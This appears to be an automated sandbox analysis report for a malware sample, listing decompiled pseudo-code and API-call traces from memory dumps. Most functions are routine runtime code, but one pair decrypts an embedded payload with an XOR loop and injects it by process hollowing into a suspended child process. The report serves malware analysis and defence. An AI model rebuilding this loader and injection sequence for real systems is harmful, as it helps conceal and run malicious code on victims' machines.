    										__eflags =  *0x45468c;
    										__eflags = __eax - 0x45468c;
    										_t136 = __edi + __esi * 2 - 0x75;
    										 *_t136 =  *(__edi + __esi * 2 - 0x75) + __dh;
    										__eflags =  *_t136;
    									case 0xf:
    										L100:
    										__esi =  *(__ebp - 4);
    										while(1) {
    											L104:
    											__eax =  *(__ebp - 4);
    											__al =  *__eax;
    											__eflags = __al;
    											if(__al == 0) {
    												break;
    											}
    											L105:
    											__eflags = __al -  *((intOrPtr*)(__ebp - 5));
    											if(__al !=  *((intOrPtr*)(__ebp - 5))) {
    												L101:
    												__eax = __eax & 0x000000ff;
    												__eflags = __eax;
    												asm("bt [0x419108], eax");
    												if(__eax >= 0) {
    													_t146 = __ebp - 4;
    													 *_t146 =  *(__ebp - 4) + 1;
    													__eflags =  *_t146;
    												} else {
    													__eax =  *(__ebp - 4);
    													 *(__ebp - 4) = E0040B044( *(__ebp - 4));
    												}
    												continue;
    											}
    											break;
    										}
    										L106:
    										__eax =  *(__ebp + 8);
    										__edx =  *(__ebp - 4);
    										__edx =  *(__ebp - 4) - __esi;
    										__esi = E004088C4(__edx,  *(__ebp + 8));
    										__eax =  *(__ebp - 4);
    										__eflags =  *__eax;
    										if( *__eax != 0) {
    											 *(__ebp - 4) =  *(__ebp - 4) + 1;
    										}
    										goto L109;
    								}
    							} else {
    								__eflags = _t181 - 0x4d;
    								if(_t181 == 0x4d) {
    									__eflags = _t232 - 0x48;
    									if(_t232 == 0x48) {
    										_t181 = 0x4e;
    									}
    								}
    								L9:
    								_t232 = _t181;
    								goto L10;
    							}
    						} else {
    							E004088C4(E0040B024( *((intOrPtr*)(_t282 - 4))),  *((intOrPtr*)(_t282 + 8)));
    							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
    							_t232 = 0x20;
    							continue;
    						}
    					}
    					L110:
    					 *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) - 0x108)) - 1;
    					_pop(_t272);
    					 *[fs:eax] = _t272;
    					_push(E00409410);
    					return E00403EAC(_t282 - 0x28, 2);
    				}
    			}


















    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0040D920(intOrPtr* __eax) {
    				char _v260;
    				char _v768;
    				char _v772;
    				intOrPtr* _v776;
    				signed short* _v780;
    				char _v784;
    				signed int _v788;
    				char _v792;
    				intOrPtr* _v796;
    				signed char _t43;
    				intOrPtr* _t60;
    				void* _t79;
    				void* _t81;
    				void* _t84;
    				void* _t85;
    				intOrPtr* _t92;
    				void* _t96;
    				char* _t97;
    				void* _t98;
    
    				_v776 = __eax;
    				if(( *(_v776 + 1) & 0x00000020) == 0) {
    					E0040D7EC(0x80070057);
    				}
    				_t43 =  *_v776;
    				if((_t43 & 0x00000fff) == 0xc) {
    					if((_t43 & 0x00000040) == 0) {
    						_v780 =  *((intOrPtr*)(_v776 + 8));
    					} else {
    						_v780 =  *((intOrPtr*)( *((intOrPtr*)(_v776 + 8))));
    					}
    					_v788 =  *_v780 & 0x0000ffff;
    					_t79 = _v788 - 1;
    					if(_t79 >= 0) {
    						_t85 = _t79 + 1;
    						_t96 = 0;
    						_t97 =  &_v772;
    						do {
    							_v796 = _t97;
    							_push(_v796 + 4);
    							_t22 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040C9FC();
    							E0040D7EC(_v780);
    							_push( &_v784);
    							_t25 = _t96 + 1; // 0x1
    							_push(_v780);
    							L0040CA04();
    							E0040D7EC(_v780);
    							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
    							_t96 = _t96 + 1;
    							_t97 = _t97 + 8;
    							_t85 = _t85 - 1;
    						} while (_t85 != 0);
    					}
    					_t81 = _v788 - 1;
    					if(_t81 >= 0) {
    						_t84 = _t81 + 1;
    						_t60 =  &_v768;
    						_t92 =  &_v260;
    						do {
    							 *_t92 =  *_t60;
    							_t92 = _t92 + 4;
    							_t60 = _t60 + 8;
    							_t84 = _t84 - 1;
    						} while (_t84 != 0);
    						do {
    							goto L12;
    						} while (E0040D8C4(_t83, _t98) != 0);
    						goto L15;
    					}
    					L12:
    					_t83 = _v788 - 1;
    					if(E0040D894(_v788 - 1, _t98) != 0) {
    						_push( &_v792);
    						_push( &_v260);
    						_push(_v780);
    						L0040CA0C();
    						E0040D7EC(_v780);
    						E0040DB18(_v792);
    					}
    				}
    				L15:
    				_push(_v776);
    				L0040C598();
    				return E0040D7EC(_v776);
    			}























    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040D9CF
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040D9EB
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DA62
    • VariantClear.OLEAUT32(?), ref: 0040DA8B
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040B3A0() {
    				char _v152;
    				short _v410;
    				signed short _t14;
    				signed int _t16;
    				int _t18;
    				void* _t20;
    				void* _t23;
    				int _t24;
    				int _t26;
    				signed int _t30;
    				signed int _t31;
    				signed int _t32;
    				signed int _t37;
    				int* _t39;
    				short* _t41;
    				void* _t49;
    
    				 *0x454738 = 0x409;
    				 *0x45473c = 9;
    				 *0x454740 = 1;
    				_t14 = GetThreadLocale();
    				if(_t14 != 0) {
    					 *0x454738 = _t14;
    				}
    				if(_t14 != 0) {
    					 *0x45473c = _t14 & 0x3ff;
    					 *0x454740 = (_t14 & 0x0000ffff) >> 0xa;
    				}
    				memcpy(0x419108, 0x40b4f4, 8 << 2);
    				if( *0x4190c0 != 2) {
    					_t16 = GetSystemMetrics(0x4a);
    					__eflags = _t16;
    					 *0x454745 = _t16 & 0xffffff00 | _t16 != 0x00000000;
    					_t18 = GetSystemMetrics(0x2a);
    					__eflags = _t18;
    					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
    					 *0x454744 = _t31;
    					__eflags = _t31;
    					if(__eflags != 0) {
    						return E0040B328(__eflags, _t49);
    					}
    				} else {
    					_t20 = E0040B388();
    					if(_t20 != 0) {
    						 *0x454745 = 0;
    						 *0x454744 = 0;
    						return _t20;
    					}
    					E0040B328(__eflags, _t49);
    					_t37 = 0x20;
    					_t23 = E00402C54(0x419108, 0x20, 0x40b4f4);
    					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
    					 *0x454744 = _t32;
    					__eflags = _t32;
    					if(_t32 != 0) {
    						 *0x454745 = 0;
    						return _t23;
    					}
    					_t24 = 0x80;
    					_t39 =  &_v152;
    					do {
    						 *_t39 = _t24;
    						_t24 = _t24 + 1;
    						_t39 =  &(_t39[0]);
    						__eflags = _t24 - 0x100;
    					} while (_t24 != 0x100);
    					_t26 =  *0x454738; // 0x409
    					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
    					_t18 = 0x80;
    					_t41 =  &_v410;
    					while(1) {
    						__eflags =  *_t41 - 2;
    						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
    						 *0x454745 = _t37;
    						__eflags = _t37;
    						if(_t37 != 0) {
    							goto L17;
    						}
    						_t41 = _t41 + 2;
    						_t18 = _t18 - 1;
    						__eflags = _t18;
    						if(_t18 != 0) {
    							continue;
    						} else {
    							return _t18;
    						}
    						L18:
    					}
    				}
    				L17:
    				return _t18;
    				goto L18;
    			}




















    APIs
    • GetThreadLocale.KERNEL32 ref: 0040B3CA
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
    • GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
    • GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 0040B328: GetCPInfo.KERNEL32(00000000,?), ref: 0040B341
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040152C(void* __eax, void** __ecx, void* __edx) {
    				void* _t4;
    				void** _t9;
    				void* _t13;
    				void* _t14;
    				long _t16;
    				void* _t17;
    
    				_t9 = __ecx;
    				_t14 = __edx;
    				_t17 = __eax;
    				 *(__ecx + 4) = 0x100000;
    				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
    				_t13 = _t4;
    				 *_t9 = _t13;
    				if(_t13 == 0) {
    					_t16 = _t14 + 0x0000ffff & 0xffff0000;
    					_t9[1] = _t16;
    					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
    					 *_t9 = _t4;
    				}
    				if( *_t9 != 0) {
    					_t4 = E0040137C(0x4545e4, _t9);
    					if(_t4 == 0) {
    						VirtualFree( *_t9, 0, 0x8000);
    						 *_t9 = 0;
    						return 0;
    					}
    				}
    				return _t4;
    			}










    APIs
    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040154A
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040156F
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 00401595
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405E00(void* __eax, int __ecx, long __edx) {
    				void* _t2;
    				void* _t4;
    
    				_t2 = GlobalHandle(__eax);
    				GlobalUnWire(_t2);
    				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
    				GlobalFix(_t4);
    				return _t4;
    			}






    APIs
    • GlobalHandle.KERNEL32 ref: 00405E03
    • GlobalUnWire.KERNEL32(00000000), ref: 00405E0A
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00405E0F
    • GlobalFix.KERNEL32(00000000), ref: 00405E15
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00408B80(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
    				char _v8;
    				short _v18;
    				short _v22;
    				struct _SYSTEMTIME _v24;
    				char _v280;
    				char* _t32;
    				intOrPtr* _t49;
    				intOrPtr _t58;
    				void* _t63;
    				void* _t67;
    
    				_v8 = 0;
    				_t49 = __edx;
    				_t63 = __eax;
    				_push(_t67);
    				_push(0x408c5e);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t67 + 0xfffffeec;
    				E00403E88(__edx);
    				_v24 =  *((intOrPtr*)(_a4 - 0xe));
    				_v22 =  *((intOrPtr*)(_a4 - 0x10));
    				_v18 =  *((intOrPtr*)(_a4 - 0x12));
    				if(_t63 > 2) {
    					E00403F20( &_v8, 0x408c80);
    				} else {
    					E00403F20( &_v8, 0x408c74);
    				}
    				_t32 = E00404348(_v8);
    				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
    					E004040F8(_t49, 0x100,  &_v280);
    					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
    						E004043A8( *_t49, E00404148( *_t49) - 1, 2, _t49);
    					}
    				}
    				_pop(_t58);
    				 *[fs:eax] = _t58;
    				_push(E00408C65);
    				return E00403E88( &_v8);
    			}














    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00408C5E), ref: 00408C06
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408C0C
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 50%
    			E0041844E() {
    				struct _SYSTEM_INFO _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr* _t15;
    				void* _t31;
    				signed int _t34;
    				void* _t38;
    				void* _t39;
    				void* _t45;
    				void* _t51;
    
    				_v44 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				_push(_t45);
    				_push(0x418517);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t45 + 0xffffffd0;
    				GetSystemInfo( &_v40);
    				_t34 = 0;
    				_t31 = 0x39a91;
    				_t15 = 0x41944c;
    				do {
    					if(_t34 == 0x20) {
    						_t34 = 0;
    					}
    					_t5 = (_t34 & 0x000000ff) + 0x452ee0; // 0x8845645c
    					_t30 = ( *_t15 - _t34 ^  *_t5) + _t34;
    					 *_t15 = ( *_t15 - _t34 ^  *_t5) + _t34;
    					_t34 = _t34 + 1;
    					_t15 = _t15 + 1;
    					_t31 = _t31 - 1;
    				} while (_t31 != 0);
    				L5:
    				_push("h`JE");
    				_push("-t ");
    				_push(0);
    				E004070E8( &_v48, _t51, _v40.dwNumberOfProcessors >> 1);
    				_push(_v48);
    				_push(0x41853c);
    				_push( *0x454a5c);
    				E00404208();
    				_push(_v44);
    				E004029A4(0,  &_v52);
    				_pop(_t38);
    				E00417F5C(_v52, _t30, 0x41944c, _t38, _t39, _t42, _t51);
    				goto L5;
    			}















    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 53%
    			E00418450() {
    				struct _SYSTEM_INFO _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr* _t15;
    				void* _t30;
    				signed int _t33;
    				void* _t37;
    				void* _t38;
    				intOrPtr _t42;
    				void* _t47;
    
    				_v44 = 0;
    				_v52 = 0;
    				_v48 = 0;
    				_push(0x418517);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t42;
    				GetSystemInfo( &_v40);
    				_t33 = 0;
    				_t30 = 0x39a91;
    				_t15 = 0x41944c;
    				do {
    					if(_t33 == 0x20) {
    						_t33 = 0;
    					}
    					_t5 = (_t33 & 0x000000ff) + 0x452ee0; // 0x8845645c
    					_t29 = ( *_t15 - _t33 ^  *_t5) + _t33;
    					 *_t15 = ( *_t15 - _t33 ^  *_t5) + _t33;
    					_t33 = _t33 + 1;
    					_t15 = _t15 + 1;
    					_t30 = _t30 - 1;
    				} while (_t30 != 0);
    				L4:
    				_push("h`JE");
    				_push("-t ");
    				_push(0);
    				E004070E8( &_v48, _t47, _v40.dwNumberOfProcessors >> 1);
    				_push(_v48);
    				_push(0x41853c);
    				_push( *0x454a5c);
    				E00404208();
    				_push(_v44);
    				E004029A4(0,  &_v52);
    				_pop(_t37);
    				E00417F5C(_v52, _t29, 0x41944c, _t37, _t38, _t40, _t47);
    				goto L4;
    			}















    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 83%
    			E0040BC54(void* __edx) {
    				void* _t6;
    				void* _t13;
    				void* _t17;
    				void* _t20;
    				void* _t21;
    				void* _t22;
    
    				_t17 = __edx;
    				if(__edx != 0) {
    					_t22 = _t22 + 0xfffffff0;
    					_t6 = E00403404(_t6, _t21);
    				}
    				_t20 = _t6;
    				E004030E4(0);
    				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
    				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
    				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
    				 *(_t20 + 0x18) = 0xffffffff;
    				 *((intOrPtr*)(_t20 + 0x20)) = E004030E4(1);
    				_t13 = _t20;
    				if(_t17 != 0) {
    					E0040345C(_t13);
    					_pop( *[fs:0x0]);
    				}
    				return _t20;
    			}










    APIs
    • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC7E
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC8E
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E004179B4(void* __eax) {
    				void* _t3;
    
    				L0040C518();
    				if(__eax != 0) {
    					_t3 = E0040A56C("WSACleanup", 1);
    					E0040386C();
    					return _t3;
    				}
    				return __eax;
    			}





    APIs
    • WSACleanup.WSOCK32(00417A06,00000000,00417A14), ref: 004179B4
    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 78%
    			E0040F0A8(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
    				void* _v8;
    				char _v264;
    				char _v520;
    				char _v524;
    				signed char _t47;
    				intOrPtr* _t59;
    				intOrPtr _t61;
    				intOrPtr* _t75;
    				void* _t78;
    
    				_v524 = 0;
    				_t75 = __edx;
    				_t47 = __eax;
    				_push(_t78);
    				_push(0x40f1ce);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t78 + 0xfffffdf8;
    				_t73 = __eax & 0x00000fff;
    				if((__eax & 0x00000fff) > 0x14) {
    					if(__eax != 0x100) {
    						if(__eax != 0x101) {
    							if(E0040F504(__eax,  &_v8) == 0) {
    								E00407110( &_v524, 4);
    								_t59 =  *0x4530ec; // 0x419128
    								E00404194(_t75, _v524,  *_t59);
    							} else {
    								E00403064( *_v8,  &_v520);
    								E004027B4( &_v520, 0x7fffffff, 2,  &_v264);
    								E004040EC(__edx,  &_v264);
    							}
    						} else {
    							E00403EDC(__edx, 0x40f1f4);
    						}
    					} else {
    						E00403EDC(__edx, "String");
    					}
    				} else {
    					E00403EDC(__edx,  *((intOrPtr*)(0x419358 + (_t73 & 0x0000ffff) * 4)));
    				}
    				if((_t47 & 0x00000020) != 0) {
    					E00404194(_t75,  *_t75, "Array ");
    				}
    				if((_t47 & 0x00000040) != 0) {
    					E00404194(_t75,  *_t75, "ByRef ");
    				}
    				_pop(_t61);
    				 *[fs:eax] = _t61;
    				_push(E0040F1D5);
    				return E00403E88( &_v524);
    			}













    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0041381C(intOrPtr __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
    				intOrPtr _v8;
    				char _v12;
    				char* _t15;
    				char* _t23;
    				intOrPtr _t30;
    				char _t31;
    				intOrPtr _t39;
    				intOrPtr _t42;
    				void* _t45;
    
    				_v12 = 0;
    				_t23 = __edx;
    				_push(_t45);
    				_push(0x4138c2);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t45 + 0xfffffff8;
    				_v8 = 0;
    				if(__edx != 0) {
    					_t39 = __eax;
    					while( *_t23 != 0) {
    						_t15 = _t23;
    						while(1) {
    							_t31 =  *_t23;
    							if(_t31 == 0 || _t31 + 0xd3 - 2 < 0) {
    								break;
    							}
    							_t23 = _t23 + 1;
    						}
    						E00403F78( &_v12, _t23 - _t15, _t15);
    						_t42 = E004165D4(_t39, _t23 - _t15, _v12);
    						if(_t42 == 0 && E00406E50(_v12, 0x4138dc) != 0) {
    							_t42 = _t39;
    						}
    						if(_t42 != 0) {
    							if( *_t23 == 0x2e) {
    								_t23 = _t23 + 1;
    							}
    							if( *_t23 == 0x2d) {
    								_t23 = _t23 + 1;
    							}
    							if( *_t23 == 0x3e) {
    								_t23 = _t23 + 1;
    							}
    							_t39 = _t42;
    							continue;
    						}
    						goto L19;
    					}
    					_v8 = _t39;
    				}
    				L19:
    				_pop(_t30);
    				 *[fs:eax] = _t30;
    				_push(E004138C9);
    				return E00403E88( &_v12);
    			}













    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 96%
    			E0041498C(void* __eax, void* __ecx, void* __edx) {
    				signed int _t7;
    				void* _t8;
    				void* _t17;
    				void* _t29;
    
    				_push(__ecx);
    				_t29 = __edx;
    				_t17 = __eax;
    				_t7 = E004155CC(__ecx) & 0x0000007f;
    				if(_t7 > 0xd) {
    					L7:
    					_t8 = E00413A2C();
    				} else {
    					_t1 = _t7 + E004149B3; // 0x5
    					switch( *((intOrPtr*)( *_t1 * 4 +  &M004149C1))) {
    						case 0:
    							goto L7;
    						case 1:
    							E00413F54(_t17, 1, _t30);
    							E00403F78(_t29,  *_t30, 0);
    							_t8 = E00413F54(_t17,  *_t30, E004043A0(_t29));
    							goto L8;
    						case 2:
    							__eax = __esi;
    							__edx = 0x414a58;
    							__eax = E00403EDC(__esi, 0x414a58);
    							goto L8;
    						case 3:
    							__eax = __esi;
    							__edx = 0x414a68;
    							__eax = E00403EDC(__esi, 0x414a68);
    							goto L8;
    						case 4:
    							__eax = __esi;
    							__edx = 0x414a78;
    							__eax = E00403EDC(__esi, 0x414a78);
    							goto L8;
    						case 5:
    							__eax = __esi;
    							__edx = 0x414a84;
    							__eax = E00403EDC(__esi, 0x414a84);
    							goto L8;
    					}
    				}
    				L8:
    				return _t8;
    			}








    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040AC28() {
    				intOrPtr* _t5;
    				intOrPtr* _t6;
    				intOrPtr* _t7;
    				intOrPtr* _t8;
    				intOrPtr* _t9;
    				intOrPtr _t12;
    				intOrPtr _t13;
    				intOrPtr _t16;
    				intOrPtr* _t17;
    				intOrPtr* _t18;
    
    				_t12 =  *0x452f70; // 0x405e70
    				 *0x45478c = E0040A628(_t12, 1);
    				_t13 =  *0x453040; // 0x405ef0
    				 *0x454790 = E0040A628(_t13, 1);
    				_t5 =  *0x452f34; // 0x454008
    				 *_t5 = 0x40a7a4;
    				_t6 =  *0x452fa8; // 0x454004
    				 *_t6 = E0040AC18;
    				_t7 =  *0x452f64; // 0x45401c
    				_t16 =  *0x406188; // 0x4061d4
    				 *_t7 = _t16;
    				_t8 =  *0x452f98; // 0x45400c
    				 *_t8 = E0040A968;
    				_t9 =  *0x452fac; // 0x454010
    				 *_t9 = E0040AB4C;
    				_t17 =  *0x453054; // 0x454020
    				 *_t17 = E0040A8B4;
    				_t18 =  *0x452f24; // 0x454028
    				 *_t18 = E0040A8D0;
    				return E0040A8D0;
    			}














    Strings
    Memory Dump Source
    • Source File: 0000000E.00000002.1522394213.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_obtG43AWHP.jbxd

    Executed Functions

    APIs
    • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 0020E0C6
    • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0020E0DC
    • CreateProcessA.KERNEL32(?,00000000), ref: 0020E1C2
    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 0020E1F0
    • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 0020E235
    • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 0020E271
